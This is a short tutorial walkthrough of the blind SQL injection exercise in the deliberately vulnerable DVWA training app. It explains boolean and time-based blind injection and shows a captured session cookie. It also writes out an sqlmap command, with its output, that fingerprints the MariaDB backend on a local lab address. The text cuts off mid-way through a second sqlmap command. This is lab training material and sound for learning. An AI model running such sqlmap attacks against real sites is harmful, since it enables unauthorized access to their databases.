07/02/2022
DVWA exploit SQL Injection (Blind) at Low Level
When an attacker executes SQL injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL query's syntax is incorrect. Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather then getting a useful error message, they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through SQL statements, and monitoring how the web application response (valid entry returned or 404 header set).
"time based" injection method is often used when there is no visible feedback in how the page different in its response (hence its a blind attack). This means the attacker will wait to see how long the page takes to response back. If it takes longer than normal, their query was successful.
Objective
Find the version of the SQL database software through a blind SQL attack.
For this exploit we will use sqlmap and Burp-Suite.
We need to intercept the request because the site uses cookies.
We need this cookie for sqlmap.
Insert a value into the txtbox: 1
Capture the Request with Burp-Suite
Cookie: security=low; PHPSESSID=bdabcae42a3fd6d726ec51e1dbe731df
Copy the cookie and the link
To find the version of the SQL database software we will run this command:
root@blackbox:/opt/lampp # sqlmap -u "http://192.168.1.4/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit #" --cookie="security=low; PHPSESSID=bdabcae42a3fd6d726ec51e1dbe731df" -f --banner --dbs
back-end DBMS: active fingerprint: MySQL >= 5.5
comment injection fingerprint: MySQL 5.6.49
banner parsing fingerprint: MySQL 10.1.37
fork fingerprint: MariaDB
banner: '10.1.37-MariaDB'
We can get more obviously....
root@blackbox:/opt/lampp # sqlmap -u "http://192.168.1.8/dvwa/vulnerabi
